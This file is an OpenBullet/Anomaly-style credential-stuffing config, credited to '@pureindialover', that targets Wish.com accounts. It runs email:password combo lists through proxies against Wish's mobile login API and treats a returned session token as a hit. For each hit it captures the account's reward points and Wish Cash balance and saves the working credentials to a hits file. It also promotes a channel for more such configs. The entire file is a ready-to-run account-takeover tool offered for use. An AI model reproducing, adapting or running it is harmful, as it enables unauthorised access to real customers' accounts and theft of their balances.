[SETTINGS]
{
  "Name": "Wish Config By @pureindialover",
  "SuggestedBots": 199,
  "MaxCPM": 0,
  "LastModified": "2020-07-13T16:22:11.1359832+05:30",
  "AdditionalInfo": "Join Our Channel For More Such Configs: @pureindialover_configs",
  "Author": "@pureindialover",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#pureindialover REQUEST POST "https://www.wish.com/api/email-login?email=<USER>&password=<PASS>&session_refresh=false&app_device_id=13dc8379-82b2-3b01-aeab-592a7c78ed38&_xsrf=1&_client=androidapp&_capabilities=2%2C3%2C4%2C6%2C7%2C9%2C11%2C12%2C13%2C15%2C21%2C24%2C25%2C28%2C35%2C37%2C39%2C40%2C43%2C46%2C47%2C49%2C50%2C51%2C52%2C53%2C55%2C57%2C58%2C60%2C61%2C64%2C65%2C67%2C68%2C70%2C71%2C74%2C76%2C77%2C78%2C80%2C82%2C83%2C85%2C86%2C90%2C93%2C94%2C95%2C96%2C100%2C101%2C102%2C103%2C106%2C108%2C109%2C110%2C111%2C153%2C114%2C115%2C117%2C118%2C122%2C123%2C124%2C125%2C126%2C128%2C129%2C132%2C133%2C134%2C135%2C138%2C139%2C146%2C147%2C148%2C149%2C150%2C152%2C154%2C155%2C156%2C157%2C159%2C160%2C161%2C162%2C163%2C164%2C165%2C166%2C171%2C172%2C173%2C174%2C175%2C176%2C177%2C180%2C181%2C182%2C184%2C185%2C186%2C187%2C188%2C189%2C190%2C191%2C192%2C193%2C194%2C195%2C196%2C197%2C198%2C199%2C200%2C201%2C202%2C203%2C204%2C205%2C206%2C207%2C209&_app_type=wish&_riskified_session_token=9cd23af4-f035-4fb2-809b-c0fede01d029&_threat_metrix_session_token=7625-6c870f21-b654-4d63-b79d-e607cd23f212&advertiser_id=caf72538-cf4c-4328-9c1c-a4f33e16d6d4&_version=4.36.1&app_device_model=SM-G930K" 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-G930K Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/74.0.3729.136 Mobile Safari/537.36" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Content-Length: 1142" 
  HEADER "Host: www.wish.com" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Accept-Encoding: gzip" 
  HEADER "Cookie: _xsrf=1; _appLocale=en_UK; bsid=ce4ef3483572f1fb8d459bab4564f8d8; _timezone=8.0; _timezone_id=Asia/Shanghai" 

#pureindialover KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Email or Password is incorrect" 
  KEYCHAIN Success OR 
    KEY " \"session_token\": " 

#pureindialover PARSE "<COOKIES(sweeper_session)>" LR "" "" -> VAR "sweeper_session" 

#pureindialover PARSE "<sweeper_session>" LR "\"" "\"" -> VAR "sweeper_session" 

#pureindialover REQUEST POST "https://www.wish.com/api/redeemable-rewards/get-rewards?get_dashboard_info=true&offset=0&count=20&reward_type=1&app_device_id=13dc8379-82b2-3b01-aeab-592a7c78ed38&_xsrf=1&_client=androidapp&_capabilities=2%2C3%2C4%2C6%2C7%2C9%2C11%2C12%2C13%2C15%2C21%2C24%2C25%2C28%2C35%2C37%2C39%2C40%2C43%2C46%2C47%2C49%2C50%2C51%2C52%2C53%2C55%2C57%2C58%2C60%2C61%2C64%2C65%2C67%2C68%2C70%2C71%2C74%2C76%2C77%2C78%2C80%2C82%2C83%2C85%2C86%2C90%2C93%2C94%2C95%2C96%2C100%2C101%2C102%2C103%2C106%2C108%2C109%2C110%2C111%2C153%2C114%2C115%2C117%2C118%2C122%2C123%2C124%2C125%2C126%2C128%2C129%2C132%2C133%2C134%2C135%2C138%2C139%2C146%2C147%2C148%2C149%2C150%2C152%2C154%2C155%2C156%2C157%2C159%2C160%2C161%2C162%2C163%2C164%2C165%2C166%2C171%2C172%2C173%2C174%2C175%2C176%2C177%2C180%2C181%2C182%2C184%2C185%2C186%2C187%2C188%2C189%2C190%2C191%2C192%2C193%2C194%2C195%2C196%2C197%2C198%2C199%2C200%2C201%2C202%2C203%2C204%2C205%2C206%2C207%2C209&_app_type=wish&_riskified_session_token=9cd23af4-f035-4fb2-809b-c0fede01d029&_threat_metrix_session_token=7625-6c870f21-b654-4d63-b79d-e607cd23f212&advertiser_id=caf72538-cf4c-4328-9c1c-a4f33e16d6d4&_version=4.36.1&app_device_model=SM-G930K" 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-G930K Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/74.0.3729.136 Mobile Safari/537.36" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Content-Length: 1115" 
  HEADER "Host: www.wish.com" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Accept-Encoding: gzip" 
  HEADER "Cookie: _xsrf=1; _appLocale=en_UK; bsid=ce4ef3483572f1fb8d459bab4564f8d8; sweeper_session=<sweeper_session>; _timezone=8.0; _timezone_id=Asia/Shanghai" 

#pureindialover PARSE "<SOURCE>" JSON "available_points_text" -> VAR "points" 

#pureindialover PARSE "<points>" LR "" "points" CreateEmpty=FALSE -> CAP "Points" 

#pureindialover REQUEST GET "https://www.wish.com/transaction" 
  
  HEADER "User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-G930K Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/74.0.3729.136 Mobile Safari/537.36" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Content-Length: 1115" 
  HEADER "Host: www.wish.com" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Accept-Encoding: gzip" 
  HEADER "Cookie: _xsrf=1; _appLocale=en_UK; bsid=ce4ef3483572f1fb8d459bab4564f8d8; sweeper_session=<sweeper_session>; _timezone=8.0; _timezone_id=Asia/Shanghai" 

#pureindialover PARSE "<SOURCE>" LR "\"wish_cash_balance\": \"" "\", " CreateEmpty=FALSE -> CAP "balance" 

#credits FUNCTION Constant "Config Made By @pureindialover | Join Our Channel For More Such Configs: @pureindialover_configs" -> CAP "credits" 

#Hits_Saver UTILITY File "wish hits by @pureindialover.txt" AppendLines "\\n<<<<<<=Account=>>>>>>\\r\\nCombo: <USER>:<PASS>\\r\\nEmail: <USER>\\r\\nPassword: <PASS>\\r\\n<<<<<<=Capture=>>>>>>\\r\\nPoints: <Points>\\r\\nBalance <balance>\\r\\n<<<<<<=END=>>>>>>\\r\\nConfig made by @pureindialover\\r\\nJoin Our Channel For More Configs Like This: @pureindialover_configs\\n\\n" -> VAR "saver" 

